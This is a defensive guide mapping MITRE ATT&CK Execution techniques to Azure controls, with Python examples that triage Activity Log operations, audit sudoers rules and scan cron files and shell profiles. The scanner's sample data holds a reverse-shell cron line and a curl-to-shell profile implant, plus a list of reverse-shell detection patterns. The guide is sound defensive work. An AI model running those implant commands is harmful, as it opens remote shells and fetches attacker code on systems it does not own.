Defensive Strategies: TA0002

Defensive Strategies for TA0002 - Execution

The Execution tactic covers attackers running attacker-controlled code inside a compromised environment, usually as the step that enables later objectives such as privilege escalation, lateral movement, or exfiltration. In Azure, attackers abuse scripting interpreters on VMs, Automation accounts and runbooks, the Azure Resource Manager API, and remote command features such as VM Run Command to execute code without ever opening an interactive session. Below are key defensive strategies for TA0002 mapped to relevant techniques.

1. Limit Scripting and Shell Access

Mitigates: T1059 - Command and Scripting Interpreter (T1059.001 PowerShell, T1059.004 Unix Shell, T1059.006 Python)

  • Action: Restrict the use of PowerShell, Bash, and other scripting interpreters to the accounts and hosts that need them, and log what they execute.

  • Azure Solution:

    • Disable PowerShell remoting (WinRM) on VMs where it is not explicitly required; where it is, expose it only through Just Enough Administration (JEA) endpoints that limit the cmdlets available to the operator.

    • Use AppLocker or Windows Defender Application Control (WDAC) to block unsigned or unapproved scripts; an enforced WDAC policy also puts PowerShell into Constrained Language Mode, which removes the .NET and COM access most offensive PowerShell tooling depends on.

    • Turn on PowerShell script block logging (Event ID 4104) and module logging on Windows, and auditd or syslog capture of shell activity on Linux, and forward both to Microsoft Sentinel; Defender for Cloud (Defender for Servers) adds behavioural alerts on the host itself.

2. Monitor and Secure Automation Accounts

Mitigates: T1651 - Cloud Administration Command (Automation runbooks), T1569.002 - System Services: Service Execution

  • Action: Ensure that Automation runbooks, schedules and webhooks are not modified or triggered to run attacker-supplied scripts; a runbook executes under the Automation account's identity, so it is a ready-made code-execution path for anyone who can edit it.

  • Azure Solution:

    • Use the Azure Monitor Activity Log to track changes to Automation accounts and runbooks (operations such as Microsoft.Automation/automationAccounts/runbooks/write and runbooks/draft/write).

    • Set Microsoft Sentinel alerts for runbook jobs (Microsoft.Automation/automationAccounts/jobs/write) started by unexpected identities, outside change windows, or immediately after a runbook edit.

    • Apply least privilege to the Automation account's managed identity: scope it to the resource groups it actually manages instead of granting Contributor at subscription scope. Run As accounts have been retired in favour of managed identities, so any remaining Run As service principals should be removed rather than left as a second credential.

3. Control Remote Command Execution

Mitigates: T1651 - Cloud Administration Command (VM Run Command), T1569 - System Services

  • Action: Monitor and restrict remote command execution on VMs through VM Run Command, which runs scripts as SYSTEM or root via the VM agent without needing any credentials on the VM itself.

  • Azure Solution:

    • Restrict who can invoke Run Command through RBAC: the operation requires Microsoft.Compute/virtualMachines/runCommand/action, which Owner and Virtual Machine Contributor both include, so review built-in and custom role assignments for it and remove it where not required.

    • Enable Defender for Servers (formerly Azure Defender for VMs) to detect suspicious script executions on virtual machines, including scripts delivered through the VM agent.

    • Use just-in-time (JIT) VM access to limit the windows in which RDP and SSH are reachable; note that JIT controls network ports only and does not gate Run Command, which goes through the Azure control plane, so RBAC remains the control for that path.

4. Monitor API Calls for Execution Activities

Mitigates: T1106 - Native API (applied here to the Azure Resource Manager REST API, the control-plane counterpart of the OS-level API the technique describes)

  • Action: Track control-plane API calls that can create resources, change permissions, or trigger automation, since each of these is a route to code execution.

  • Azure Solution:

    • Use Azure Monitor and Microsoft Sentinel to alert on suspicious control-plane operations, such as role assignments (Microsoft.Authorization/roleAssignments/write) or VM creation (Microsoft.Compute/virtualMachines/write), especially when made by an identity or from an IP address that has not performed them before.

    • Stream the Activity Log to a Log Analytics workspace (it is retained for only 90 days otherwise) and baseline per-caller operation patterns so that unusual API activity can be spotted and investigated.
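As an added example (not code from the original page), the following Python script triages a handful of constructed AzureActivity-style rows, the shape Sentinel presents once the Activity Log is streamed to Log Analytics, for the operations sections 2 to 4 above call out: Run Command invocations, runbook edits and job starts, role assignments and VM creation. The operation names are the real Azure Resource Manager operation strings; the identities, IP addresses, resource IDs and the trusted-caller and trusted-network allow lists are assumptions for the example, and the ATT&CK IDs in the table are this example's own mapping.

```python
"""Triage AzureActivity rows for control-plane operations that give code
execution (added example; rows, identities and allow lists are constructed)."""
import ipaddress
import json
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Lower-cased ARM operation -> (ATT&CK technique, label, severity when an untrusted
# caller succeeds). The operation strings are real ARM operations; the mapping is ours.
WATCHED_OPERATIONS: Dict[str, Tuple[str, str, str]] = {
    "microsoft.compute/virtualmachines/runcommand/action": ("T1651", "VM Run Command invoked", "High"),
    "microsoft.automation/automationaccounts/runbooks/write": ("T1651", "Automation runbook modified", "High"),
    "microsoft.automation/automationaccounts/jobs/write": ("T1651", "Automation runbook job started", "Medium"),
    "microsoft.authorization/roleassignments/write": ("T1098.003", "RBAC role assignment created", "High"),
    "microsoft.compute/virtualmachines/write": ("T1578.002", "Virtual machine created or updated", "Medium"),
}
# Hypothetical pipeline identity and corporate egress range (a Sentinel watchlist in practice).
TRUSTED_CALLERS = {"ops-automation@contoso.example"}
TRUSTED_NETWORKS = [ipaddress.ip_network("10.20.0.0/16")]


@dataclass(frozen=True)
class Finding:
    technique: str
    severity: str
    caller: str
    caller_ip: str
    operation: str
    resource: str
    reason: str


def from_trusted_network(ip: str) -> bool:
    """True if the caller IP falls inside an allow-listed range; empty or malformed is untrusted."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_NETWORKS)


def triage_row(row: dict) -> Optional[Finding]:
    """Return a Finding for a watched operation, or None if the row is benign."""
    operation = row.get("OperationNameValue", "")
    watched = WATCHED_OPERATIONS.get(operation.lower())
    if watched is None:
        return None
    status = row.get("ActivityStatusValue", "")
    if status == "Start":
        return None  # ARM logs Start, then Success/Failure: alert once, on the outcome
    technique, label, base_severity = watched
    caller, caller_ip = row.get("Caller", ""), row.get("CallerIpAddress", "")
    if status == "Success" and caller in TRUSTED_CALLERS and from_trusted_network(caller_ip):
        return None  # the pipeline identity acting from its usual network: expected change
    if status == "Success":
        severity = base_severity
        reason = f"{label} by {caller} from {caller_ip or 'unknown IP'} (not allow-listed)"
    else:  # a failed attempt is often an identity probing which permissions it holds
        severity = "Medium"
        reason = f"{label} failed ({status}) for {caller}; possible permission probing"
    return Finding(technique, severity, caller, caller_ip, operation, row.get("_ResourceId", ""), reason)


def triage_log(jsonl: str) -> List[Finding]:
    """Parse newline-delimited JSON rows and return findings in log order."""
    rows = (triage_row(json.loads(line)) for line in jsonl.splitlines() if line.strip())
    return [finding for finding in rows if finding is not None]


# Constructed sample rows; the subscription ID, identities and addresses are placeholders.
SUB = "/subscriptions/00000000-0000-0000-0000-000000000000"


def _row(op: str, caller: str, ip: str, status: str, resource: str) -> str:
    return json.dumps({"OperationNameValue": op, "Caller": caller, "CallerIpAddress": ip,
                       "ActivityStatusValue": status, "_ResourceId": SUB + resource})


SAMPLE_LOG = "\n".join([
    # pipeline identity from the corporate range: suppressed
    _row("Microsoft.Compute/virtualMachines/runCommand/action", "ops-automation@contoso.example",
         "10.20.0.15", "Success", "/resourceGroups/prod/providers/Microsoft.Compute/virtualMachines/web01"),
    # unknown user grants a role from an external address: High
    _row("Microsoft.Authorization/roleAssignments/write", "mallory@contoso.example",
         "203.0.113.45", "Success", "/providers/Microsoft.Authorization/roleAssignments/11111111-1111-1111-1111-111111111111"),
    # trusted identity but from outside its network (stolen token?): High
    _row("Microsoft.Automation/automationAccounts/runbooks/write", "ops-automation@contoso.example",
         "198.51.100.7", "Success", "/resourceGroups/prod/providers/Microsoft.Automation/automationAccounts/aa-prod/runbooks/Patch-Servers"),
    # failed Run Command by a low-privilege user: Medium
    _row("Microsoft.Compute/virtualMachines/runCommand/action", "intern@contoso.example",
         "10.20.3.9", "Failure", "/resourceGroups/prod/providers/Microsoft.Compute/virtualMachines/db01"),
    # Start record of a VM write: ignored until the outcome row arrives
    _row("Microsoft.Compute/virtualMachines/write", "mallory@contoso.example",
         "203.0.113.45", "Start", "/resourceGroups/prod/providers/Microsoft.Compute/virtualMachines/vm-tmp"),
])

if __name__ == "__main__":
    for f in triage_log(SAMPLE_LOG):
        print(f"[{f.severity}] {f.technique}: {f.reason} -> {f.resource}")
```

The same logic expressed as a Sentinel analytics rule would join AzureActivity against a watchlist of expected identities and source ranges; the point of the allow list being identity and network together is that a legitimate service principal acting from an unexpected address is exactly the token-theft case a per-identity allow list would hide.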

5. Detect Malicious User-Initiated Actions

Mitigates: T1204 - User Execution (T1204.001 Malicious Link, T1204.002 Malicious File)

  • Action: Monitor for and block social engineering that gets users to open malicious links or files, still the most common way attacker code first runs on a workstation.

  • Azure Solution:

    • Use Microsoft Defender for Office 365 (Safe Links and Safe Attachments) to block phishing attempts and malicious attachments before they reach the mailbox.

    • Configure Microsoft Entra ID (Azure AD) Conditional Access policies to require compliant devices and MFA, so that credentials phished from a user are not enough on their own to sign in.

    • Enable the Microsoft 365 unified audit log and Defender for Endpoint telemetry so that file executions and access attempts that follow a phishing click are visible for investigation.

6. Disable or Restrict Sudo Access on Linux VMs

Mitigates: T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching

  • Action: Limit sudo on Linux VMs to named commands for named users; a rule such as ALL=(ALL) NOPASSWD: ALL turns any compromised account into root.

  • Azure Solution:

    • Enforce SSH key-based authentication and disable password logins, and give operators individual accounts rather than a shared one so that every sudo invocation is attributable.

    • Grant sudo per command in /etc/sudoers.d files, avoid NOPASSWD, and do not allow binaries that offer a shell escape (editors, pagers, interpreters), since they make a narrow-looking rule equivalent to full root.

    • Use Defender for Servers to monitor for unauthorized privilege escalation attempts, and ship auth.log (or the journal) to Sentinel so that sudo activity, including failed attempts, is recorded off-host.
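The following Python script is an added example (not part of the original page) of the review behind the second bullet: it parses the user-specification lines of a sudoers file and flags rules that grant ALL, grant ALL without a password, or allow a binary with a known shell escape. The sudoers content is constructed for the example, and alias and include directives are skipped rather than resolved, so a real audit would also walk /etc/sudoers.d and expand Cmnd_Alias entries.

```python
"""Audit sudoers rules for grants that amount to unrestricted root
(added example; the sudoers content below is constructed)."""
import re
from dataclasses import dataclass
from typing import List, Tuple

# user|%group  hosts = (runas) [TAG:] command, command ...  -- the subset of the
# sudoers grammar this audit needs. Defaults, aliases, comments and include
# directives are skipped rather than resolved.
RULE_RE = re.compile(r"^(?P<who>[%+]?\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAG_RE = re.compile(r"\b(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|LOG_OUTPUT):")
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")

# Binaries that hand back an interactive shell (":!sh" in vim, "!sh" in less,
# system() from an interpreter). Allowing one of these via sudo is full root.
SHELL_ESCAPES = {
    "/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh", "/usr/bin/bash", "/usr/bin/vi",
    "/usr/bin/vim", "/usr/bin/nano", "/usr/bin/less", "/usr/bin/more", "/usr/bin/awk",
    "/usr/bin/find", "/usr/bin/perl", "/usr/bin/python3", "/usr/bin/env",
}


@dataclass(frozen=True)
class SudoFinding:
    who: str
    severity: str
    reason: str
    rule: str


def parse_rules(text: str) -> List[Tuple[dict, str]]:
    """Return (fields, original line) for each user specification line."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#@" or line.startswith(SKIP_PREFIXES):
            continue
        match = RULE_RE.match(line)
        if match:
            rules.append((match.groupdict(), line))
    return rules


def audit_sudoers(text: str) -> List[SudoFinding]:
    """Flag rules that give, or are equivalent to, unrestricted root."""
    findings = []
    for fields, rule in parse_rules(text):
        who = fields["who"]
        if who == "root":
            continue  # root cannot be elevated further; its own rule is not a risk
        nopasswd = "NOPASSWD:" in fields["cmds"]
        commands = [c.strip() for c in TAG_RE.sub("", fields["cmds"]).split(",") if c.strip()]
        for cmd in commands:
            if cmd.startswith("!"):
                continue  # an explicit deny entry
            prog = cmd.split()[0]
            if prog == "ALL" and nopasswd:
                findings.append(SudoFinding(who, "High", "ALL commands without a password: compromise of this account is root", rule))
            elif prog == "ALL":
                findings.append(SudoFinding(who, "Medium", "ALL commands (password required): confirm every member needs full root", rule))
            elif prog in SHELL_ESCAPES:
                findings.append(SudoFinding(who, "High", f"{prog} offers a shell escape, so this rule is equivalent to ALL", rule))
    return findings


# Constructed sample; names and the service unit are placeholders.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
Defaults        use_pty
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app.service
backup  ALL=(ALL) NOPASSWD: ALL
dev1    ALL=(ALL) /bin/bash
ops     ALL=(root) /usr/bin/vim /etc/hosts, /usr/bin/systemctl status app.service
@includedir /etc/sudoers.d
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f.severity}] {f.who}: {f.reason}\n    {f.rule}")
```

The deploy rule is the shape to aim for: one account, one fully qualified command with its arguments fixed. The ops rule looks equally narrow but is not, because vim can spawn a shell from inside the editor; the check catches that by looking at the program rather than the arguments.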

7. Use Conditional Access Policies to Limit Execution Risk

Mitigates: T1078 - Valid Accounts (T1078.004 Cloud Accounts)

  • Action: Use Conditional Access policies to restrict account usage based on context (e.g., source IP, device compliance, sign-in risk), so that a valid credential alone is not enough to execute anything.

  • Azure Solution:

    • Block risky sign-ins and require phishing-resistant MFA for privileged roles; combine this with Privileged Identity Management so that privileged roles are activated only when needed rather than held permanently.

    • Use Microsoft Entra ID Protection to detect suspicious logins and automatically force a password reset or block sign-in for accounts flagged as compromised.

8. Implement Application Whitelisting and Endpoint Protection

Mitigates: T1218 - System Binary Proxy Execution, T1127.001 - Trusted Developer Utilities Proxy Execution: MSBuild

  • Action: Restrict the execution of legitimate, signed binaries that attackers use to run their own code under a trusted name (so-called LOLBins), such as MSBuild.exe, mshta.exe and regsvr32.exe, on hosts that have no business need for them.

  • Azure Solution:

    • Use Microsoft Defender for Endpoint to monitor and block the execution of unauthorized processes; its attack surface reduction rules close several of the script- and Office-driven execution paths.

    • Implement AppLocker (or WDAC) policies that deny MSBuild.exe and similar developer utilities for all users except those who build software, and keep allow rules publisher-based rather than path-based so that copying the binary to a writable directory does not bypass them.

9. Harden VMs Against Reverse Shells and Backdoors

Mitigates: T1059.004 - Unix Shell, T1053.003 - Scheduled Task/Job: Cron, T1546.004 - Event Triggered Execution: Unix Shell Configuration Modification

  • Action: Monitor Linux VMs for reverse shells and for the cron entries and shell-profile edits attackers use to relaunch them after a reboot or a new login.

  • Azure Solution:

    • Use Defender for Servers (which deploys Defender for Endpoint on Linux) to detect and block threats including web shells and reverse-shell behaviour.

    • Enable file integrity monitoring and alert on changes to /etc/crontab, /etc/cron.d, per-user crontabs, and shell profiles such as .bashrc and .profile; outbound connections from cron-launched processes to unfamiliar hosts are the other half of the same signal.
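An added example (not from the page) of the host-side check behind that last bullet: a Python script that compares cron files and shell profiles against a known-good hash baseline, the same idea as file integrity monitoring, and then scans only the changed files for the command shapes reverse-shell one-liners use. File paths, contents and the 203.0.113.9 address are constructed for the example; in practice the baseline is recorded at image build time and the scan runs from an agent or a Sentinel-triggered playbook rather than from inline strings.

```python
"""Check cron files and shell profiles for drift from a baseline and for
reverse-shell indicators (added example; all file contents are constructed)."""
import hashlib
import re
from typing import Dict, List, Tuple

# Command shapes from common reverse-shell one-liners: (pattern, description).
INDICATORS = [
    (re.compile(r"/dev/(tcp|udp)/\S+"), "bash /dev/tcp network redirection"),
    (re.compile(r"\b(nc|ncat|netcat)\b[^\n]*\s-e\s"), "netcat with -e (execute on connect)"),
    (re.compile(r"\bmkfifo\b[^\n]*\|\s*(nc|ncat|netcat)\b"), "mkfifo pipe to netcat"),
    (re.compile(r"socket\.socket\([^\n]*\.connect\("), "python socket connect-back"),
    (re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b"), "download piped straight to a shell"),
    (re.compile(r"base64\s+(-d|--decode)\b[^\n]*\|\s*(ba|z|da)?sh\b"), "base64-decoded payload piped to a shell"),
]


def fingerprint(content: str) -> str:
    """SHA-256 of the file content, the value a baseline stores per path."""
    return hashlib.sha256(content.encode()).hexdigest()


def scan_file(path: str, content: str) -> List[Tuple[str, int, str]]:
    """Return (path, line number, description) for each indicator hit; comment lines are skipped."""
    hits = []
    for lineno, line in enumerate(content.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        for pattern, description in INDICATORS:
            if pattern.search(line):
                hits.append((path, lineno, description))
                break  # one hit per line is enough to raise it
    return hits


def detect_drift(baseline: Dict[str, str], current: Dict[str, str]) -> List[Tuple[str, str]]:
    """Compare a path->hash baseline with path->content snapshots; returns (path, change)."""
    changes = []
    for path in sorted(set(baseline) | set(current)):
        if path not in baseline:
            changes.append((path, "added"))
        elif path not in current:
            changes.append((path, "removed"))
        elif baseline[path] != fingerprint(current[path]):
            changes.append((path, "modified"))
    return changes


def review(baseline: Dict[str, str], current: Dict[str, str]):
    """Drift first, then indicator scan of the files that were added or modified."""
    changed = detect_drift(baseline, current)
    hits = []
    for path, change in changed:
        if change != "removed":
            hits.extend(scan_file(path, current[path]))
    return changed, hits


# Constructed sample: a clean baseline and a later snapshot with two implants.
CLEAN_CRONTAB = "# /etc/crontab (constructed)\nSHELL=/bin/sh\n17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
CLEAN_BASHRC = "# ~/.bashrc (constructed)\nexport PATH=$HOME/bin:$PATH\nalias ll='ls -la'\n"

BASELINE = {
    "/etc/crontab": fingerprint(CLEAN_CRONTAB),
    "/home/deploy/.bashrc": fingerprint(CLEAN_BASHRC),
}
CURRENT_FILES = {
    "/etc/crontab": CLEAN_CRONTAB,
    "/home/deploy/.bashrc": CLEAN_BASHRC + "curl -s http://203.0.113.9/u.sh | sh\n",
    "/var/spool/cron/crontabs/www-data": "*/5 * * * * bash -i >& /dev/tcp/203.0.113.9/4444 0>&1\n",
}

if __name__ == "__main__":
    changed, hits = review(BASELINE, CURRENT_FILES)
    for path, change in changed:
        print(f"{change}: {path}")
    for path, lineno, description in hits:
        print(f"  indicator at {path}:{lineno}: {description}")
```

Scanning only the changed files keeps the noisy pattern list from firing on long-standing, reviewed content, and the drift record on its own is still worth an alert even when no pattern matches, since an attacker who knows these patterns will obfuscate the payload but still has to touch the file.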

10. Respond to Execution Attempts Automatically

Mitigates: T1569 - System Services, T1106 - Native API

  • Action: Automate responses to suspicious execution activities.

  • Azure Solution:

    • Use Microsoft Sentinel playbooks (Logic Apps) to disable the account, revoke its refresh tokens, or stop or network-isolate the VM when a high-confidence execution alert fires.

    • Integrate Microsoft Defender for Cloud with Sentinel so that execution alerts from Defender for Servers land in the same incident queue and can trigger the same playbooks in near real time.

Summary of Defensive Measures for TA0002
